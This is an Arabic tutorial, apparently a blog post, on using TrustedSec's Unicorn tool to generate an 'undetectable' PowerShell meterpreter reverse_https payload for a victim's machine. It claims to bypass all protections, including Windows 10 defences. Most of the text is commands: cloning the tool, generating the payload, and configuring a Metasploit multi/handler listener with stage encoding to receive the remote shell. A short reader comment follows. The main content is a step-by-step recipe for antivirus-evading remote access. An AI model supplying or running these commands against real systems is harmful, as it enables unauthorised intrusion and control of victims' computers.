عمل بايلود مشفر غير قابل للكشف
ماهي أداة Unicorn ؟
تم إنشاؤها بواسطة TrustedSec , هي أداة بسيطة مصممة للمساعدة في اختبار الاختراق وعمل هجمات powershell وحقن البايلود shellcode الذي ينشىئ أتصال بينك وبين الضحية يعرف بكود برمجي يستخدم كبايلود مباشرة في الذاكرة
سنتعرف علي كيفية انشاء بايلود مشفر باستخدام أداة Unicorn وتخطي جميع الحمايات وأيضا تخطي حمايات وندوز 10 باخر اصداراته
تحميل اداة unicorn
git clone https://github.com/trustedsec/unicorn
بعد تحميل الاداة اذهب الى المسار
cd unicorn
او المكان الذي تم تحميل الأداه فيه
لأظهار الخيارات والاوصاف لكل هجوم استخدم الامر التالي
unicorn.py --help/.
انشاء البايلود
unicorn.py windows/meterpreter/reverse_https "your ip" "port/.
ستستخدم الااداة unicorn ميتاسبليوت موديل reverse_https للهجوم
عند توليد البايلود سوف يظهر ملفين الاول powershell_attack.txt والذي سوف يتم تنفيذه بجهاز الضحية والملف الثاني unicorn.rc وهو يحتوي على الاعدادات التي سوف يتم ادخالها في الميتاسبلويت
اوامر الميتاسبلويت
بعد تشغيل الاداة ادخل الاوامر التالية
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST your ip
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit
عاش
ردحذف